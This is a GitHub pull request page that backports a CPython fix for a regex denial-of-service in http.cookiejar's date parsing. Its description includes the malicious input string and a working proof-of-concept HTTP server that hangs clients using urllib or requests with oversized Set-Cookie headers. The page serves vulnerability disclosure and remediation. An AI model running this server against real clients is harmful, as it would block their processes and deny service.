Skip to content

Conversation

@miss-islington
Copy link
Contributor

@miss-islington miss-islington commented Nov 22, 2019

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

\d+-\w+-\d+(\s*\s*\s*)$ 

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") 

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) GH- Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) GH- Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 GH- Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): GH- Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() 

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") 

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

import requests requests.get("http://localhost:44020/") 
  • Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

  • Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller bcaller@users.noreply.github.com

https://bugs.python.org/issue38804

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) GH- Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) GH- Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 GH- Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): GH- Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was. (cherry picked from commit 1b779bf) Co-authored-by: bcaller <bcaller@users.noreply.github.com>
Copy link
Member

@vstinner vstinner left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM, good bot.

@vstinner
Copy link
Member

@serhiy-storchaka: Would you mind to review this straighforward (automated) backport of PR #17157 that you approved?

@miss-islington
Copy link
Contributor Author

@bcaller and @vstinner: Status check is done, and it's a success ✅ .

@miss-islington
Copy link
Contributor Author

Sorry, I can't merge this PR. Reason: You're not authorized to push to this branch. Visit https://help.github.com/articles/about-protected-branches/ for more information..

@miss-islington
Copy link
Contributor Author

@bcaller and @vstinner: Status check is done, and it's a success ✅ .

@miss-islington
Copy link
Contributor Author

Sorry, I can't merge this PR. Reason: You're not authorized to push to this branch. Visit https://help.github.com/articles/about-protected-branches/ for more information..

@miss-islington
Copy link
Contributor Author

@bcaller and @vstinner: Status check is done, and it's a success ✅ .

@miss-islington
Copy link
Contributor Author

Sorry, I can't merge this PR. Reason: You're not authorized to push to this branch. Visit https://help.github.com/articles/about-protected-branches/ for more information..

@ned-deily ned-deily merged commit 0716056 into python:3.6 Nov 22, 2019
@bedevere-bot
Copy link

@ned-deily: Please replace # with GH- in the commit message next time. Thanks!

@miss-islington miss-islington deleted the backport-1b779bf-3.6 branch November 22, 2019 22:09
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

type-security A security issue

6 participants